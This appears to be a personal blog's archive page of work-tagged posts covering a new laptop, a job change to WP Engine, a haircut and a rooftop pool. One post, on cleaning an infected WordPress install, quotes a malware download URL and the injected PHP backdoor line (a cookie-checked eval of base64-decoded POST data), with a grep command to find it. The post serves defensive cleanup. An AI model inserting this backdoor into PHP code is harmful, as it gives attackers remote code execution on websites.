Jason Cosper

Semper fudge.

Tag: Work Page 1 of 4

CMD + Conquer

When I started over at WP Engine earlier this week, a brand new MacBook Air came into my possession. It’s very pretty and lightweight and I kind of love it more than any other computer I’ve ever owned. So much so that I made the decision to break with my normal tradition and keep this hot little number sticker free.

That declaration only lasted about a day and a half tho…

Why? Well, I just came across the Command Bamboo Back from Grove. And I really want it. Like in a bad way.

It’s not a traditional sticker tho. It’s made out of real bamboo. And the shape carved into it actually changes that (somewhat ubiquitous) glowing Apple logo into something that I love so much that I put it on me forever.

Anyhow, they’ve got a bunch of clever and novel designs over there. If you’re looking for something a bit different, do yourself a favor and browse around their shop.

Ch-ch-ch-ch-changes

Hey. How’s it going?

I’ve got some pretty major news that I’ve been sitting on for a while now, but the time has come where I can finally share it.

Ready? Okay. Here we go…

After October 26th, I will no longer work with the very amazing and inspiring people at DreamHost. Considering that I’ve been loyal to them for well over 5 years now — and I thought I’d be here for much longer — that’s kind of a big deal for me.

But that’s nothing compared to what’s next…

Just under three weeks from now, I’ll be hopping on a plane to Austin to start working with the wicked smart crew over at WP Engine. If you don’t know about them yet, they’re a startup that focuses solely on highly optimized WordPress hosting.

No mail. No one-click installer full of other stuff. No Rails or Django. Just pure, unadulterated WordPress.

Now this new job doesn’t mean that Sarah and I are going to be moving to Texas or anything. In fact, I still get to live and work in Los Angeles. I’m mostly just heading out there to get familiar with the team and soak up as much barbecue as stupid Weight Watchers will let me.

Anyhow, it’s really exciting (not to mention a bit scary) to go from an established company to a startup. But I really believe in what WP Engine is trying to do. It’s a fantastic space and a great idea and I’m ready to help make an impact.

Wish me luck!

Goodbye Horses

So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed.  When visiting an infected site, most folks are being prompted to download: 

http://gvatemal.biz/pfd/spl/pdf.pdf

Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.

So how do you find out if your install has been hit?  Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php

<?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>

If you see that floating around, get rid of it!  Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.

Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:

grep -R 0bdcf3981272c15a /home/user/example.com/*

Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed.  Give that command a few minutes to run and you should get a path of where that code snippet can be found.  All you have to do at that point is purge it and clear any cache you might have on your WP install.

Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.

All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.

The Return of Eraserhead

It might be a time for a trim when, after the company holiday party, your boss wanders into your office and says:

Jason, it’s great to see you upright with your head on straight.  [long pause]  Your hair still must be drunk tho…

Oh hat head, I hate you so.

Downtown’s Secret Community Pool

Today, the coworkers decided to celebrate the birth of our country a day early by grabbing a quick lunch by the pool at The Standard and taking a post nosh dip.

Apparently, all you need to do to swim in the rooftop pool is buy a drink or grab a bite to eat. Had I known this, I’d have tried pulling that little scam off much sooner.

Some hipster girl let us know that she makes it over to The Standard a few times a week despite working at the Bonaventure because it’s not too crowded on the weekdays. Good to know.

With that being said, mojitos run about $13 — and beers are only slightly less expensive — so you might want to take that into consideration.

Still, it’s a fun way to kill an afternoon. You should go try it sometime…

Page 1 of 4

Powered by WordPress & Theme by Anders Norén